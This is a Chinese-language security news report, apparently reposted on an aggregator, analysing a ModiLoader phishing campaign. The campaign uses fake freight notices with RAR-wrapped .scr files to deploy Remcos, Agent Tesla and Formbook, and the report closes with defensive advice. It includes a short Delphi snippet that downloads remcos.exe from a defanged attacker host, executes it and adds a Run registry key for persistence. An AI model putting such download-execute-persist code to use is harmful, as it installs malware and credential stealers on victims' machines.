安全客 04月08日 11:20
恶意软件 ModiLoader 利用复杂钓鱼手段威胁企业信息安全
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

本文分析了恶意软件操作者利用.scr文件格式进行恶意攻击的案例。攻击者通过精心设计的网络钓鱼邮件,冒充货运物流公司,诱使受害者打开包含恶意.scr文件的RAR压缩包,从而部署ModiLoader恶意软件,进而下载并执行远程访问木马(RAT)和数据窃取程序。攻击目标涉及多个行业和地区,攻击者采用先进的规避技术,如进程空洞化和反沙盒检查,以逃避检测。Symantec提供了多层防御措施,并建议企业采取预防措施,以应对此类威胁。

📧 攻击始于伪装成货运通知的网络钓鱼邮件,邮件诱导用户打开RAR压缩文件。

📦 RAR压缩文件包含伪装成发票或装箱单的恶意.scr文件,该文件一旦执行,将启动ModiLoader恶意软件。

⚙️ ModiLoader使用HTTP GET请求与C2服务器通信,下载加密的恶意负载,并使用进程空洞化技术将其注入到合法进程中。

🎯 攻击目标行业广泛,包括工业机械制造、汽车、电子和广播等领域,涉及日本、美国和东南亚等地区。

🛡️ 为了对抗分析,.scr文件会进行反沙盒检查,并释放诱饵文档以维持其合法性。Symantec提供了多层防御措施,并建议企业阻止.scr文件的执行和实施电子邮件附件沙盒化。

恶意软件操作者利用 .scr 文件格式来分发恶意负载,他们借助这种文件在表面上看似无害的系统文件特性,实则利用其可执行的本质进行恶意活动。

网络安全研究人员近期观察到的攻击活动显示,攻击者采用了先进的策略,通过复杂的网络钓鱼计划来瞄准全球范围内的企业。

一个突出的例子是,攻击者冒充一家货运物流公司,传播 ModiLoader,这是一种长期存在的基于 Delphi 的恶意软件加载器,能够部署远程访问木马(RAT)和数据窃取程序。

Symantec 的Broadcom 分析师记录了在 2025 年 3 月至 4 月期间的一场持续攻击活动,在这次活动中,威胁行为者发送了模仿货运通知的电子邮件。

这些邮件提到了虚构的清关信息和国际货运内容,以此来增加可信度。

所附的 RAR 压缩文件中包含伪装成发票或装箱单的恶意.scr 文件,这引发了一系列事件,最终导致 ModiLoader 被部署。

该加载器随后会获取诸如 Remcos、Agent Tesla 和 Formbook 等二级恶意负载,使攻击者能够窃取凭据、监控按键操作,并建立持久的访问权限。

此次攻击的目标行业涵盖了工业机械制造、汽车、电子和广播等领域,涉及的地区包括日本、美国、以及东南亚。

这种地域和行业的多样性凸显了攻击者广泛的目标,从窃取知识产权到破坏企业运营。

感染机制和技术执行过程

攻击始于一封网络钓鱼邮件,邮件指示收件人查看一个附件 RAR 压缩文件。

压缩文件内包含一个.scr 文件,一旦解压,该文件就会执行 ModiLoader。

procedure TMainForm.Button1Click(Sender: TObject);begin

DownloadPayload(‘hxxp://malicious-c2[.]top/download/remcos.exe’);

ExecutePayload(‘%APPDATA%\remcos.exe’);

SetRegistryKey(‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run’, ‘UpdateService’, ‘%APPDATA%\remcos.exe’);end;

ModiLoader 使用 HTTP GET 请求与命令控制(C2)服务器进行通信,下载经过加密的恶意负载,从而逃避基于签名的检测。

恶意软件使用进程空洞化技术,将这些恶意负载注入到诸如 explorer.exe 或 svchost.exe 等合法进程中,这种技术是用恶意代码替换可执行文件的内存段。

Symantec 的监测数据显示,该加载器进行了模块化更新,能够根据受害者的特征动态切换恶意负载。

为了对抗分析,.scr 文件会通过查询系统运行时间和已安装的安全软件来进行反沙盒检查。

如果未达到某些阈值,恶意软件就会进入睡眠循环或终止运行。一旦恶意软件激活,它会释放一个名为 “Invoice_JN-032525C.pdf” 的诱饵文档,以维持其合法性的假象,同时在后台执行恶意操作。

Symantec 通过多层防御措施来应对这些威胁,包括启发式检测(Heur.AdvML.B)和静态分析规则(Trojan.Gen.MBT)。

建议企业在高风险环境中阻止.scr 文件的执行,并实施电子邮件附件沙盒化,以便在恶意负载部署之前拦截它们。

 

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

恶意软件 .scr文件 网络钓鱼 ModiLoader 安全防御
相关文章